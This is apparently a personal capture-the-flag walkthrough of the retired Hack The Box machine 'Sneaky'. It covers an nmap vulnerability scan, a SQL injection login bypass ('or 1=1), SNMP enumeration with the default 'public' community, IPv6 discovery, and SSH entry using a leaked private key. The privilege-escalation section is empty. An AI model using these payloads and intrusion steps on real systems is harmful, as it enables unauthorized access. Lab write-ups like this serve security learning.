Sneaky # ENUMERATION NMAP - 80: Apache httpd 2.4.7 ((Ubuntu)) http-title: Under Development! | vulners: | cpe:/a:apache:http_server:2.4.7: | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679 | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 | CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 | CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226 | CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788 | CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217 | CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927 | CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098 | CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934 | CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220 | CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 | CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798 | CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 | CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743 | CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161 | CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736 | CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523 | CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231 | CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092 | CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975 | CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185 | CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109 | CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118 | CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117 | CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 |_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612 ======================================================================== # EXPLOIT # SQL INJECTION (into the password) admin / 'or 1=1; name: admin name: thrasivoulos and a link to 'my key' http://10.10.10.20/dev/sshkeyforadministratordifficulttimes - revealed a private key... - there is no port 22 on IPv4 - is the SSH port changed to another... nope, checked all that showed up. ======================================================================== # ENUMERATION # SNMPWALK - Being at the limit of my knowledge, it was time to learn something new - a tutorial for Sneaky revealed a new tool that I hadn't used as of yet - snmpwalk is a tool used by many network admins to get readings on their equipment. - with it, they can troubleshoot behaviors or verify configurations - In the case of this machine, we see snmp on port 161 kali@kali:~/HTB/RETIRED/Sneaky$ snmpwalk -v2c -c public 10.10.10.20 > snmp.txt - This reveals a massive amount of data! - I didn't understand much of the data until I read through some googles, but... - The results revealed IPv6 on the machine ======================================================================== # ENUMERATION # ENYX.PY - Another tool that I hadn't used before was called Enyx. - This tool will grab IPv6 through SNMP [+] Snmpwalk found. [+] Grabbing IPv6. [+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001 [+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:c506 [+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:c506 ======================================================================== # EXPLOIT # SSH KEY - Now, I could use the ssh key found earlier to connect - There were two names presented, and only the second on worked. $ ssh -i id_rsa_sneaky thrasivoulos@dead:beef:0000:0000:0250:56ff:feb9:c506 Your Hardware Enablement Stack (HWE) is supported until April 2019. Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077 thrasivoulos@Sneaky:~$ ls user.txt Foot-hold complete! ======================================================================== # SAVE FOR LATER PRIVILEGE ESCALATION ========================================================================